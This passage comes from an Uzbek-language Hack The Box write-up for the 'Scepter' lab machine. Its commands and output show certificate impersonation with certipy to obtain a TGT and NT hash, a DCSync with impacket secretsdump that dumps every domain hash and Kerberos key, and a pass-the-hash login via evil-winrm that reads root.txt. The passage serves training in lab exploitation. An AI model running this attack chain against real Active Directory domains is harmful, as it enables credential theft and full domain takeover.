Endi Active Directory p.adams foydalanuvchisi bilan:

Ushbu sertifikat orqali kirish mumkin bo‘ladi

Ya’ni meow.pfx sertifikati endi p.adams foydalanuvchisi uchun ishlaydi

Bu orqali "certificate impersonation", ya’ni "sertifikat orqali boshqa userga

o‘xshab kirish" qilish mumkin.

Endi Sertifikat orqali TGT olamiz

㉿
┌──(root kali)-[/home/kali/Desktop/HTB/Specter]
└─# ntpdate -u xx.xx.xx.xx

┌──(root ㉿kali)-[/home/kali/Desktop/HTB/Specter]
└─# ntpdate -u xx.xx.xx.xx | certipy-ad auth -pfx meow.pfx -dc-ip 10.10.11.
65 -username p.adams
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] The provided username does not match the identification found in the p
rovided certificate: 'P.ADAMS' - 'meow$'
Do you want to continue? (Y/n) [*] Using principal: [email protected]
[*] Trying to get TGT...

Scepter 27
 [*] Got TGT
[*] Saved credential cache to 'p.adams.ccache'
[*] Trying to retrieve NT hash for 'p.adams'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51
404ee:1b925c524f447bb821a8789c4b118c7e0

altSecurityIdentities orqali bu sertifikat p.adams ga mapping bo‘lganligi uchun, TGT

olish ishlayapti
Sertifikat meow$ uchun yaratilgan bo‘lsa ham, biz uni p.adams ga uladik — va
TGT olishga muvaffaq bo‘ldik

p.adamsfoydalanuvchisi REPLICATION OPERATORS azosi va u orqali DCsync

hujumini amalga oshirsa bo’ladi va uni qilamiz

┌──(root ㉿kali)-[/home/kali/Desktop/HTB/Specter]
└─# python3 /usr/share/doc/python3-impacket/examples/secretsdump.py
-just-dc -hashes aad3b435b51404eeaad3b435b51404ee:1b925c524f447
bb821a8789c4b118c7e0 scepter.htb/[email protected]
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Scepter 28
 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f
9773dc615e66c2ea217c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73
c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b11
00ee37064a4a9:::
scepter.htb\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0
d99e7a475316213c15b6f22ce:::
scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2e2465
0b1e4f376fa574da438078d200:::
scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf52
42092c6fb8c360a08069c75a0c:::
scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c
524f447bb821a8789c4b118ce0:::
scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf191
4e9efe3ef3a7a6e7136f60f3:::
scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844
d2175c90f7a48e77fa92fce04:::
scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c73
70a5e33541985b508ffa24ce5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a1722
9b18ba639ccfd5f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:cc5d676d45f8287aef2f1abcd652
13d9575c86c54c9b1977935983e28348bcd5
Administrator:aes128-cts-hmac-sha1-96:bb557b22bad08c219ce7425f2fe
0b70c
Administrator:des-cbc-md5:f79d45bf688aa238
krbtgt:aes256-cts-hmac-sha1-96:5d62c1b68af2bb009bb4875327edd5e4
065ef2bf08e38c4ea0e609406d6279ee
krbtgt:aes128-cts-hmac-sha1-96:b9bc4dc299fe99a4e086bbf2110ad676
krbtgt:des-cbc-md5:57f8ef4f4c7f6245
scepter.htb\d.baker:aes256-cts-hmac-sha1-96:6adbc9de0cb3fb631434e5
13b1b282970fdc3ca089181991fb7036a05c6212fb

Scepter 29
 scepter.htb\d.baker:aes128-cts-hmac-sha1-96:eb3e28d1b99120b4f64241
9c99a7ac19
scepter.htb\d.baker:des-cbc-md5:2fce8a3426c8c2c1
scepter.htb\a.carter:aes256-cts-hmac-sha1-96:5a793dad7f782356cb6a74
1fe73ddd650ca054870f0c6d70fadcae162a389a71
scepter.htb\a.carter:aes128-cts-hmac-sha1-96:f7643849c000f5a7a6bd5c
88c4724afd
scepter.htb\a.carter:des-cbc-md5:d607b098cb5e679b
scepter.htb\h.brown:aes256-cts-hmac-sha1-96:5779e2a207a7c94d20be1a
105bed84e3b691a5f2890a7775d8f036741dadbc02
scepter.htb\h.brown:aes128-cts-hmac-sha1-96:1345228e68dce06f6109d4
d64409007d
scepter.htb\h.brown:des-cbc-md5:6e6dd30151cb58c7
scepter.htb\p.adams:aes256-cts-hmac-sha1-96:0fa360ee62cb0e7ba851fc
e9fd982382c049ba3b6224cceb2abd2628c310c22f
scepter.htb\p.adams:aes128-cts-hmac-sha1-96:85462bdef70af52770b22
60963e7b39f
scepter.htb\p.adams:des-cbc-md5:f7a26e794949fd61
scepter.htb\e.lewis:aes256-cts-hmac-sha1-96:1cfd55c20eadbaf4b8183c3
02a55c459a2235b88540ccd75419d430e049a4a2b
scepter.htb\e.lewis:aes128-cts-hmac-sha1-96:a8641db596e1d26b6a6943f
c7a9e4bea
scepter.htb\e.lewis:des-cbc-md5:57e9291aad91fe7f
scepter.htb\o.scott:aes256-cts-hmac-sha1-96:4fe8037a8176334ebce849
d546e826a1248c01e9da42bcbd13031b28ddf26f25
scepter.htb\o.scott:aes128-cts-hmac-sha1-96:37f1bd1cb49c4923da5fc82
b347a25eb
scepter.htb\o.scott:des-cbc-md5:e329e37fda6e0df7
scepter.htb\M.clark:aes256-cts-hmac-sha1-96:a0890aa7efc9a1a14f671582
92a18ff4ca139d674065e0e4417c90e5a878ebe0
scepter.htb\M.clark:aes128-cts-hmac-sha1-96:84993bbad33c1392872390
15be840598
scepter.htb\M.clark:des-cbc-md5:4c7f5dfbdcadba94
DC01$:aes256-cts-hmac-sha1-96:4da645efa2717daf52672afe81afb3dc89
52aad72fc96de3a9feff0d6cce71e1
DC01$:aes128-cts-hmac-sha1-96:a9f8923d526f6437f5ed343efab8f77a

Scepter 30
 DC01$:des-cbc-md5:d6923e61a83d51ef
[*] Cleaning up...

administrator hashi bilan evil-winrm orqali bo’g’lanamiz

㉿
┌──(root kali)-[/home/kali/Desktop/HTB/Specter]
└─# evil-winrm -i scepter.htb -u administrator -H a291ead3493f9773dc61
5e66c2ea217c4

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoti

ng_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/

Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

Directory: C:\Users\Administrator\Desktop

Mode LastWriteTime Length Name

---- ------------- ------ ----
-ar--- 4/20/2025 2:50 PM 34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt

bfa210003342f1962a476d176a2fe57dd
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

Scepter 31